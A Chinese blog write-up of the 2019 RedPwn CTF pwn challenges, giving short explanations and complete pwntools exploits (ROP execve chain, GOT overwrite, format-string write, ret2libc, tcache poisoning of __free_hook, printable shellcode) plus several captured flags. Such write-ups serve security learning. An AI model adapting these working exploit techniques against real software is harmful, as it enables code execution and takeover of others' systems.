
CTF-RedPwn-19年8月

Pwn

0x1 BabbyPwn

连进去,然后等着,就会出 flag

0x2 Bronze Ropchain

存在栈溢出,可以考虑用 ROPgadget 直接生成 ROP 链,并排除地址中含有 \x00 字符或换行符的 gadget

# Let ROPgadget emit a ready-made execve chain; --badbytes rejects any gadget whose
# address contains a 0x00 or 0x0a byte (the write-up says the chain must avoid NUL
# and newline bytes).
ROPgadget --binary ./bronze_ropchain --badbytes "00|0a" --ropchain
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from struct import pack
# context.log_level = 'debug'
# Padding goes here
# ROP chain for the 32-bit binary, emitted by ROPgadget (see header comment).
# Python 2 only: pack() returns str there, so '' += pack(...) concatenates; on
# Python 3 this raises TypeError (str + bytes).
#
# What the gadgets below do, phase by phase (per their own comments):
#   1. store "/bin" at .data and "//sh" at .data+4 through `mov [edx], eax`,
#      then a zero dword at .data+8, leaving a NUL-terminated "/bin//sh";
#   2. ebx = .data (the path), ecx = edx = .data+8 (the zero dword -- presumably
#      serving as empty argv/envp arrays, as in the usual ROPgadget template);
#   3. eax = 0, then eleven `inc eax` -> eax = 11, execve on i386;
#   4. int 0x80.
p = ''
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
# Phase 2: register setup for the syscall.
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
# Phase 3: eax = 11 without a NUL-containing immediate (xor, then 11 x inc).
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80
# 28 bytes of filler before the chain (the distance to the saved return address
# for this binary; its derivation is not shown on the page).
payload = 'A'*28 + p
#r = process('bronze_ropchain')
# Remote target from the write-up; use the commented-out process() line for local runs.
r = remote('chall.2019.redpwn.net',4004)
r.recvuntil('What is your name?\n')
#gdb.attach(r)
r.sendline(payload)
# An extra empty line -- presumably consumed by a second read in the binary;
# not explained on the page.
r.sendline('')
r.interactive()

0x3 Bronze Ropchain

yeet 中的漏洞可以改写 chunk_head 的值,进而控制 GOT

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"  # verbose pwntools I/O logging
context.arch = "i386"        # 32-bit target: p32/u32 are used below
# Loaded but never referenced afterwards: the GOT and chunk_head addresses in
# pwn() are hard-coded instead of being read from `elf`.
elf = ELF("dennis")
# Placeholders; pwn() rebinds them to the connection and the libc ELF.
sh = 0
lib = 0
def add(size):
    """Menu option 1 (add): send the command, then *size* as its argument."""
    sh.recvuntil("Command me: ")
    sh.sendline("1")
    sh.recvuntil(":")
    sh.sendline(str(size))
def show(size):
    """Menu option 2 (show): send the command, then *size* as its argument.

    Output is left in the connection for the caller to parse.
    """
    sh.recvuntil("Command me: ")
    sh.sendline("2")
    sh.recvuntil(":")
    sh.sendline(str(size))
def edit(content):
    """Menu option 4 (edit): send the command, then *content* as one line.

    Note the shorter prompt match ("me: ") compared with the other helpers;
    presumably the prompt text differs here -- confirm against the binary.
    """
    sh.recvuntil("me: ")
    sh.sendline("4")
    sh.recvuntil(":")
    sh.sendline(content)
def free():
    """Menu option 5 (free); takes no argument."""
    sh.recvuntil("Command me: ")
    sh.sendline("5")
def vul():
    """Menu option 3 -- presumably the 'yeet' action whose bug the write-up
    says redirects chunk_head; confirm against the binary's menu."""
    sh.recvuntil("Command me: ")
    sh.sendline("3")
def pwn(ip,port,debug):
    """Run the exploit against ip:port, or against a local ./dennis when debug == 1.

    Rebinds the module-level `sh` (connection) and `lib` (libc ELF) globals.
    Python 2 only: str and p32() output are concatenated directly.
    """
    global sh
    global lib
    if(debug == 1):
        sh = process("./dennis")
        lib = ELF("/lib/i386-linux-gnu/libc.so.6")
    else:
        sh = remote(ip,port)
        lib = ELF("libc-2.23.so")
    # Address of the binary's chunk_head variable (hard-coded for this build).
    chunk_head = 0x0804B050
    # Allocate, free, re-allocate, then plant two pointers in the chunk. The
    # write-up says option 3 ("yeet") then redirects chunk_head; 0x0804B004 is
    # presumably inside the GOT, since the show() that follows yields GOT
    # entries -- confirm in the binary.
    add(0x8)
    free()
    add(0x8)
    edit(p32(0x0804B004) + p32(chunk_head))
    vul()
    # Dump 0x18 bytes through the redirected chunk; the last 4 bytes before the
    # next prompt are taken as free's resolved GOT entry.
    show(0x18)
    free_got = u32(sh.recvuntil("Command",True)[-4:])
    libc = free_got - lib.symbols['free']
    system = libc + lib.symbols['system']
    log.success("free: " + hex(free_got))
    log.success("libc: " + hex(libc))
    log.success("system: " + hex(system))
    # Rewrite the same region: "/bin/sh" first, then five consecutive GOT slots.
    # The fourth slot (where free_got was read from, judging by the 0x18-byte
    # dump) now holds system; the others are restored to their real addresses
    # so the program keeps running until the final free().
    payload = '/bin/sh\x00'
    payload += p32(libc + lib.symbols['setbuf'])
    payload += p32(libc + lib.symbols['printf'])
    payload += p32(libc + lib.symbols['gets'])
    payload += p32(system)
    payload += p32(libc + lib.symbols['fgets'])
    edit(payload)
    # free() now dispatches to system; its argument is presumably the chunk
    # starting with "/bin/sh" written above (inferred from the layout).
    free()
    sh.interactive()
# debug=0: connect to the remote target from the write-up; pass 1 to run ./dennis locally.
if __name__ == "__main__":
    pwn("chall.2019.redpwn.net",4006,0)

0x4 HARDMODE

题目打开直接拿到shell,然后cat flag.txt,很脑洞的是

flag就是下面这一行

cat: flag.txt: No such file or directory

0x5 Rot26

简单的格式化字符串漏洞

#!/usr/bin/env python
from pwn import *
#p = process('./rot26')
# Remote target from the write-up; use the commented-out process() line for local runs.
p = remote('chall.2019.redpwn.net',4003)
elf = ELF('./rot26')
# Address written over the GOT entry; the name suggests a function in the
# binary that spawns a shell -- confirm in the disassembly.
shell = 0x8048737
# Argument index at which printf sees the start of the user-controlled buffer.
offset = 7
# pwntools builds a %n-based write that stores `shell` into exit's GOT slot,
# so control transfers there when the program calls exit().
payload = fmtstr_payload(offset, {elf.got['exit']:shell})
p.sendline(payload)
p.interactive()
flag{w4it_d03s_r0t26_4ctu4lly_ch4ng3_4nyth1ng?}

0x6 Stop, ROP, n’, Roll

构造 "%s" 作为格式串,然后用 printf 泄露 libc 地址,接着就是 ret2libc

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"  # verbose pwntools I/O logging
context.arch = "amd64"       # 64-bit target: p64/u64 are used below
elf = ELF("srnr")            # provides .bss(), .plt, .got and .symbols for the chain
# Placeholders; pwn() rebinds them to the connection and the libc ELF.
sh = 0
lib = 0
def pwn(ip,port,debug):
    """Two-stage ret2libc: leak __libc_start_main with printf("%s"), restart,
    then return into system("/bin/sh").

    Rebinds the module-level `sh` and `lib` globals. Python 2 only: str and
    p64() output are concatenated, and `lib.search(...).next()` uses the
    Python 2 iterator protocol (Python 3 would need next(...)).
    """
    global sh
    global lib
    if(debug == 1):
        sh = process("./srnr")
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    else:
        sh = remote(ip,port)
        lib = ELF("libc.so.6")
    sh.recvuntil('[#] number of bytes: ')
    # Gadgets at fixed addresses in the binary (no PIE assumed).
    pop_rdi_ret = 0x400823
    pop_rsi_r15_ret = 0x400821
    # Filler up to the saved return address (9 + 8 suggests buffer + saved rbp;
    # the offset's derivation is not shown on the page).
    offset = 9 + 8
    # Stage 1 chain:
    #   read(0, bss+0x800, rdx)  -- rdx is not set by the chain, so the length
    #                               is whatever the register holds at that point;
    #   printf(bss+0x800, &got[__libc_start_main])  -- the buffer receives "%s"
    #                               below, so the GOT entry is printed as a string;
    #   _start                   -- restart the program for stage 2.
    payload = offset * 'a'
    payload += p64(pop_rdi_ret)
    payload += p64(0)
    payload += p64(pop_rsi_r15_ret)
    payload += p64(elf.bss() + 0x800) * 2
    payload += p64(elf.plt['read'])
    payload += p64(pop_rdi_ret)
    payload += p64(elf.bss() + 0x800)
    payload += p64(pop_rsi_r15_ret)
    payload += p64(elf.got['__libc_start_main']) * 2
    payload += p64(elf.plt['printf'])
    payload += p64(elf.symbols['_start'])
    # "0" answers the byte-count prompt; the overflowing line is sent next.
    sh.sendline("0")
    sleep(2)   # pacing between lines; the sleeps below serve the same purpose
    sh.sendline(payload)
    sleep(2)
    # Consumed by the read() in the chain: the format string printf will use.
    sh.sendline("%s")
    # Assumes the leaked address is the first thing received: read up to and
    # including the first 0x7f byte, then zero-extend to 8 bytes.
    __libc_start_main = u64(sh.recvuntil("\x7f",False).ljust(8,'\x00'))
    libc = __libc_start_main - lib.symbols['__libc_start_main']
    system = libc + lib.symbols['system']
    binsh = libc + lib.search("/bin/sh\x00").next()
    sleep(2)
    # Stage 2: the program restarted via _start; overflow again with
    # system("/bin/sh").
    sh.recvuntil('[#] number of bytes: ')
    sh.sendline("0")

    payload = offset * 'a'
    payload += p64(pop_rdi_ret)
    payload += p64(binsh)
    payload += p64(system)
    sleep(2)
    sh.sendline(payload)
    log.success("__libc_start_main:" + hex(__libc_start_main))
    sh.interactive()
# debug=0: connect to the remote target from the write-up; pass 1 to run ./srnr locally.
if __name__ == "__main__":
    pwn("chall.2019.redpwn.net",4008,0)

0x7 penpal world

tcache攻击,然后leak libc,然后覆盖__free_hook为system,然后free("/bin/sh\x00")即可

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"  # verbose pwntools I/O logging
context.arch = "amd64"       # 64-bit target: p64/u64 are used below
# Loaded but never referenced afterwards; all addresses come from the leaks.
elf = ELF("penpal_world")
# Placeholders; pwn() rebinds them to the connection and the libc ELF.
sh = 0
lib = 0
def add(idx):
    """Menu option 1: create envelope *idx*."""
    sh.recvuntil("Read a postcard")
    sh.sendline("1")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
def edit(idx,content):
    """Menu option 2: write *content* into envelope *idx*.

    Uses send(), not sendline(): no newline is appended, so exactly the bytes
    in *content* (e.g. a single p64()) are written.
    """
    sh.recvuntil("Read a postcard")
    sh.sendline("2")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
    sh.recvuntil("Write")
    sh.send(content)
def free(idx):
    """Menu option 3: free envelope *idx*."""
    sh.recvuntil("Read a postcard")
    sh.sendline("3")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
def show(idx):
    """Menu option 4: print envelope *idx*; output is left for the caller to parse."""
    sh.recvuntil("Read a postcard")
    sh.sendline("4")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
def pwn(ip,port,debug):
    """tcache attack against penpal_world (glibc 2.27): leak heap and libc,
    point __free_hook at system, then free a chunk holding "/bin/sh".

    Rebinds the module-level `sh` and `lib` globals. Python 2 only (str and
    p64() output are concatenated). The heap offsets 0x350 and 0x250 were
    found by the author for this binary and are not derived on the page.
    """
    global sh
    global lib
    if(debug == 1):
        sh = process("./penpal_world")
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    else:
        sh = remote(ip,port)
        lib = ELF("libc-2.27.so")
    # Re-adding index 1 presumably replaces its stored pointer; the program's
    # behaviour is not shown on the page.
    add(0)
    add(1)
    add(1)
    add(1)
    # Double free of envelope 1 (glibc 2.27 tcache has no double-free check):
    # the chunk's tcache next pointer now points at itself, and show() prints
    # it, giving a heap address.
    free(1)
    free(1)
    show(1)
    # The first received byte is dropped by the >> 8 (presumably a separator
    # printed before the raw pointer -- confirm).
    heap_base = u64(sh.recvuntil("\x0a\x4f\x50",True).ljust(8,'\x00')) >> 8
    heap_base = heap_base - 0x350
    # Tcache poisoning: overwrite the freed chunk's next pointer so the second
    # add(1) below returns heap_base + 0x250 ...
    edit(1,p64(heap_base + 0x250))
    add(1)
    add(1)
    # ... and write a fake chunk header there (size field 0xa1). Presumably this
    # is envelope 0's header, turning it into a 0xa0-byte chunk, larger than the
    # default fastbin limit.
    edit(1,p64(0) + p64(0xa1))
    # Seven frees fill the tcache bin for that size; the eighth free goes to the
    # unsorted bin, whose fd points into main_arena, which show(0) then prints.
    for i in range(7):
        free(0)
    free(0)
    show(0)
    main_arena = (u64(sh.recvuntil("\x7f",False).ljust(8,'\x00')) >> 8) - 96
    # main_arena - 0x10 is taken as __malloc_hook's address in this libc;
    # subtracting its symbol offset yields the libc base.
    libc = main_arena - 0x10 - lib.symbols['__malloc_hook']
    __free_hook = libc + lib.symbols['__free_hook']
    system = libc + lib.symbols['system']

    # Second tcache poison: free envelope 1, rewrite the freed chunk's next
    # pointer to __free_hook, allocate twice so the second allocation lands on
    # __free_hook, and store system there.
    add(1)
    free(1)
    edit(1,p64(__free_hook))
    add(1)
    add(1)
    edit(1,p64(system))
    # A fresh chunk holding "/bin/sh"; freeing it runs __free_hook(ptr),
    # i.e. system("/bin/sh").
    add(1)
    edit(1,'/bin/sh\x00')
    free(1)
    log.success("system: " + hex(system))
    log.success("main_arena: " + hex(main_arena))
    log.success("libc: " + hex(libc))
    log.success("heap_base: " + hex(heap_base))
    if debug == 1:
        log.success("pid = " + str(sh.pid))

    sh.interactive()
# debug=0: connect to the remote target from the write-up; pass 1 to run ./penpal_world locally.
if __name__ == "__main__":
    pwn("chall.2019.redpwn.net",4010,0)
flag{0h_n0e5_sW1p3r_d1D_5w!peEEeE}

0x8 knuth

典型的 shellcode 题,但加了限制条件:每个字节必须在 0x20 到 0x7f 之间,或者是 0x0a

可以通过栈迁移,构造超出限制的shellcode

但是需要一些数学运算

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"  # verbose pwntools I/O logging
context.arch = "i386"        # asm() below emits 32-bit code
# Loaded but never referenced afterwards.
elf = ELF("knuth")
# `sh` is rebound in pwn(); `lib` is declared global there but never assigned.
sh = 0
lib = 0
def pwn(ip,port,debug):
    """Send printable-only shellcode to ./knuth (local when debug == 1) and
    drop to an interactive shell.

    The write-up restricts input bytes to 0x20-0x7f or 0x0a, so every
    instruction below is chosen to assemble within that range. The page gives
    no derivation for the memory-operand arithmetic, so the comments only
    describe what each group of instructions does. Python 2 only (str and
    asm() output are concatenated).
    """
    global sh
    global lib
    if(debug == 1):
        sh = process("./knuth")

    else:
        sh = remote(ip,port)
    # Assigned but never used below.
    call_eax = 0x08048692
    # 16 x (push eax; pop eax): a printable no-op slide at the start.
    payload = asm('push eax')
    payload += asm('pop eax')
    payload = payload * 16
    # edx = ecx via push/pop, leaving one extra copy of ecx on the stack.
    payload += asm("push ecx")
    payload += asm('push ecx')
    payload += asm("pop edx")
    # Push "//sh" then "/bin" so the stack holds "/bin//sh"; ebx = esp -> pointer to it.
    payload += asm("push 0x68732f2f")
    payload += asm('push 0x6e69622f')
    payload += asm('push esp')
    payload += asm('pop ebx')
    payload += asm('push ecx')*2
    payload += asm('push eax')
    payload += asm('pop edi')
    # OR/XOR against bytes of the buffer itself: patches register values using
    # printable opcodes; the results depend on the buffer's contents and
    # address and are not derived on the page.
    payload += asm("or al,[eax+0x23]")
    payload += asm('push eax')
    payload += asm('push edi')
    payload += asm('pop eax')
    payload += asm('xor ax,[eax+0x69]')
    payload += asm('xor al,[eax+0x69]')
    # Pad with 0x40 ('@', which decodes as `inc eax` on i386) up to offset 0x4f,
    # where the next group must sit.
    payload = payload .ljust(0x4f,'\x40')
    payload += asm('or al,[edi+0x71]')
    # `pop esp`: the stack pivot the write-up refers to.
    payload += asm('pop esp')
    payload += asm('push eax')
    payload += asm('pop esi')
    payload += asm('pop eax')
    # eax = ecx + 0xa via push/pop and ten `inc eax`.
    payload += asm('push ecx')
    payload += asm('pop eax')
    payload += asm('inc eax') * 0xa
    payload += asm('push ecx')
    payload = payload.ljust(0x70,'\x40')
    # Trailing bytes 0x7e 0x4d decode as a short `jle`; presumably this
    # transfers control once the setup above has run -- its target is not
    # shown on the page.
    payload += '\x7e\x4D'
    sh.sendline(payload)
    sh.interactive()
# debug=0: connect to the remote target from the write-up; pass 1 to run ./knuth locally.
if __name__ == "__main__":
    pwn("chall.2019.redpwn.net",4009,0)
flag{ok so basically, this is a flag-~-urfnatoufnruiantoeakolfhepicqniuwnfkteoikcoyuqnouqnwfounoakfentou}
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2019/08/13/CTF-RedPwn-19%E5%B9%B48%E6%9C%88/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客